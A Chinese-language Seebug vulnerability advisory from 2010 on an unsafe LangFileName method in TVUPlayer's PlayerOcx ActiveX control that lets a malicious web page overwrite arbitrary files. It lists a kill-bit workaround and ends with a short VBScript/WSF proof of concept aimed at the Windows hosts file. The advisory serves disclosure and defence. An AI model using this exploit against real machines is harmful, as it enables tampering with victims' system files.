TVUPlayer PlayerOcx控件不安全方式调用漏洞

2010-02-09T00:00:00
ID SSV:19104
Type seebug
Reporter Root
Modified 2010-02-09T00:00:00

Description

TVUPlayer是一款免费的网络电视软件。

TVUPlayer所安装的PlayerOcx控件没有正确地验证传送给LangFileName方式的调用参数,用户受骗访问了恶意网页并向该方式传送了特制参数就会导致覆盖系统上的任意非隐藏文件。

TuvNetworks TVUPlayer 2.4.9 beta1[build 1797] 临时解决方法:

  • 为clsid 18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8设置kill bit。

厂商补丁:

TuvNetworks

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.tvunetworks.com/

                                        
                                            
                                                <?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8' id='target' />
<script language='vbscript'>

'File Generated by COMRaider v0.0.133 - http://labs.idefense.com

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\Online TV Player 4\PlayerOcx.ocx"
prototype = "Property Let LangFileName As String"
memberName = "LangFileName"
progid = "PlayerOcx.FormPlayer"
argCount = 1

arg1="C:\WINDOWS\system32\drivers\etc\hosts"

target.LangFileName = arg1

</script></job></package>